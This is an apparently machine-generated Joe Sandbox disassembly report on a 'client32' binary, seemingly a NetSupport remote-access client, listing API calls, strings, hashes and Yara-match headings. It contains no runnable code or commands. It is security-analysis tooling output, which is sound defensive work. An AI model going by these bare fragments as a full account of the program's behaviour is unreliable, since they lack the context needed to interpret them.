                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege
                                                                                                                                                                                                    • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
                                                                                                                                                                                                    • API String ID: 3882383554-3275751932
                                                                                                                                                                                                    • Opcode ID: 2940cffd9fc0ad11125a7878449ee45fa6743832f7028ba3a3e61afa157e7425
                                                                                                                                                                                                    • Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2940cffd9fc0ad11125a7878449ee45fa6743832f7028ba3a3e61afa157e7425
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                                                                                                    • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                                                                                                    • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 602542589-0
                                                                                                                                                                                                    • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                    • Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 110794B7
                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 110794BE
                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110795BD
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$ClientErrorExitItemLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$idata->pButtonInfo$m_hWnd
                                                                                                                                                                                                    • API String ID: 437338437-4014050597
                                                                                                                                                                                                    • Opcode ID: 7fefad6643fc5ac206fbfa3b762672b57d8a8b56631d28e1c354c15daeaa10ab
                                                                                                                                                                                                    • Instruction ID: 55a833a31570b9682aea0c7843cf32cf1838476ea70d83dcbde263135748afff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fefad6643fc5ac206fbfa3b762672b57d8a8b56631d28e1c354c15daeaa10ab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC712275E0021A9FDB04CF58C8C0EAEB7B5FF88324F108659E955AB355EB30E941CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,BBC4A55B,?,?,?), ref: 1106D0E2
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ..\ctl32\Connect.cpp, xrefs: 1106D2AA
                                                                                                                                                                                                    • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
                                                                                                                                                                                                    • erased=%d, idata->dead=%d, xrefs: 1106D293
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalEnterEventSection
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                                                                                                                                                    • API String ID: 2291802058-2272698802
                                                                                                                                                                                                    • Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                                                                                                    • Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5C4
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5F4
                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 1101D618
                                                                                                                                                                                                    • GetBkColor.GDI32(?), ref: 1101D61E
                                                                                                                                                                                                    • GetTextColor.GDI32(?), ref: 1101D6A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InflateRect$Color$Text
                                                                                                                                                                                                    • String ID: VUUU$VUUU
                                                                                                                                                                                                    • API String ID: 1214208285-3149182767
                                                                                                                                                                                                    • Opcode ID: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
                                                                                                                                                                                                    • Instruction ID: 77e576ce41c6bbc1f275e9696d100ffe4c5213a4300096d6b7fb60596d00f56b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce653334c1269ec63752947323ce46a0191a89749b5b5a7eff72ef3103528f33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0617075E0021A9BCB04CFA8C881AAEF7F5FF98324F148629E415E7385D634FA05CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(wininet.dll,00002000,00000000,00000000), ref: 689B6ABD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InternetQueryOptionA), ref: 689B6ACF
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 689B6AFC
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 689B6B52
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProcwsprintf
                                                                                                                                                                                                    • String ID: InternetQueryOptionA$http://%s/testpage.htm$wininet.dll
                                                                                                                                                                                                    • API String ID: 3145926599-227718810
                                                                                                                                                                                                    • Opcode ID: 98827519aa6d7344154ae3da86c8645c23b63a0342555d7aac86c5109b85405e
                                                                                                                                                                                                    • Instruction ID: e8637f83c55a57a5eaf5ddbe4481bfaf112274552a6f81bc592bdfa8d06c6f56
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98827519aa6d7344154ae3da86c8645c23b63a0342555d7aac86c5109b85405e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65412171D001299BDB65CF68CD81FEEB7B8AF94304F4081E9E91DA7240EB709A859F90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 110051CE
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 11005204
                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
                                                                                                                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
                                                                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
                                                                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable
                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                    • API String ID: 4290561058-4108050209
                                                                                                                                                                                                    • Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • BuildLUT(p12to8), took %d ms, xrefs: 1108B20B
                                                                                                                                                                                                    • BuildDynamicPalette(%d*%d), took %d ms, xrefs: 1108B1CF
                                                                                                                                                                                                    • SampleData(%d*%d,%d), took %d ms, xrefs: 1108B18F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Timetime
                                                                                                                                                                                                    • String ID: BuildDynamicPalette(%d*%d), took %d ms$BuildLUT(p12to8), took %d ms$SampleData(%d*%d,%d), took %d ms
                                                                                                                                                                                                    • API String ID: 17336451-2628575008
                                                                                                                                                                                                    • Opcode ID: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
                                                                                                                                                                                                    • Instruction ID: bb2eac5478b68b536a49f708560dc7754919b06093feb73e476f748ba0a9216f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 992fa46bb3b47cefd940a57ada63a850b45b29b138b254c3f8a49154365181f5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36314FB9D04119AFDB10EFA8DC84AEFBBB8EB88718F104195FD0597241D634AE50CBE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,BBC4A55B,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
                                                                                                                                                                                                    • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                                                                                                    • API String ID: 1613046405-2825297712
                                                                                                                                                                                                    • Opcode ID: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction ID: dbcb6794e105daa586ddc3bbf804ff67aea9c2c21b85bbe8f4e4c15c2f8116d0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4f0926271d226468653afaa46d6990833a17734d1eaad82ad6fde684afcfe5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9621A2B1D21269AFCB01DF99D884A9EFFB8FB49B15F10852BF521E3244D7B419018FA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1102741E
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76596610,?), ref: 1113F937
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                                                                                      • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11027448
                                                                                                                                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102749B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
                                                                                                                                                                                                    • String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
                                                                                                                                                                                                    • API String ID: 816263943-3387570681
                                                                                                                                                                                                    • Opcode ID: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                                                                                                    • Instruction ID: 425802901d1907c5be7fd2b9c3bfd6c49e25210cb6f83e26e9bc69af70aaa39f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474e4a5f26d8134d6f28c1743d0d9889b4922dd9f32edc34b04f7a1facad78e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B411C875E0131EABDB11EBB5CC45FAAF7A89B04708F5041F5E91597181EB31B9048B91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindWindowA.USER32(?,00000000), ref: 1108B274
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,04000000), ref: 1108B293
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000440,00000000,04000000,110EAA59,?,04000000,00000000,?,00000000,00000000,?,00000000,110EA93D,?,110EAA59,0000070B), ref: 1108B2A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ProcessWindow$FindOpenThread
                                                                                                                                                                                                    • String ID: Error. NULL hToken$Progman
                                                                                                                                                                                                    • API String ID: 3432422346-976623215
                                                                                                                                                                                                    • Opcode ID: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                                                                                                    • Instruction ID: 4ee04209679d4ac62f627f7e7d6e091cb71ded9887b28b928329626620bf84cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059be4ecc652e061e66f05b14170a3aabe5fe35332d29859c985ce1771b9b1d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25119675E0122D9BD751DFA4D885BEEF7B8EF4C218F1081A9EE16E7240DB31A900C7A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 110033BE
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033EA
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 1100340C
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 1100341A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                                                                                    • Opcode ID: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction ID: 24594387450efb2066981165f5525a36b814e5bc10ecad7e7e85ab1dcfd37f25
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbcc618e98ef98e9cc3961995019deef03965a6bc052ed1dd22c5c51f3fda12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F0E93AF4066677D61352666CC5F4FE66C8B91AA8F110071F614BA684EE11A80051EA
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 110032CD
                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110032F3
                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 11003317
                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 11003329
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                                                    • API String ID: 4241058051-934300333
                                                                                                                                                                                                    • Opcode ID: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                                                                                                    • Instruction ID: d79372c4e35f96c7b6d882990e3a1748ca0edf213b09d886e21f34e7a2ab119d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e539d231b0ab8dca2ce90518cca292f254de65541413167144fb169119e5813
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0E93AF4052777C21352663C49F8FF6684B81BA8F154071F911B5645EE14640051E6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000080,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 110ED563
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
                                                                                                                                                                                                    • Instruction ID: 402bb12deb77936e5eeacb062a8de3ed675085140f67c3334ce786458653fa44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 912ebd34f1d1380a87c8c5cba27fd19df60eae7bcd2f60170d1a9065acc2d3f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141A772E012199FD710CFA9D885BAEF7F8EF84719F10856AE916DB240DB35E500CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,1112E5E6,00000000,?), ref: 110ED158
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,1112E5E6,00000000,?), ref: 110ED16D
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110ED18F
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 110ED19C
                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110ED1AB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1BB
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 110ED1D5
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 110ED1DC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3489003387-0
                                                                                                                                                                                                    • Opcode ID: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                                                                                    • Instruction ID: db3aae85cbeca24dbd9e457748b34ba45ed53121808abb5c6b0ad0e7882c1e57
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac9894072b1dc3d21a11d3d1ba5530177ea57d988780f7ec85b0a03793c60cba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9218332A0111AAFD701DFA9C889BFEF7BCEB45219F1040ABFB05D6140DB34990187A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1113F2CB
                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 1113F2E8
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 1113F309
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F312
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 1113F31C
                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F33A
                                                                                                                                                                                                    • DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
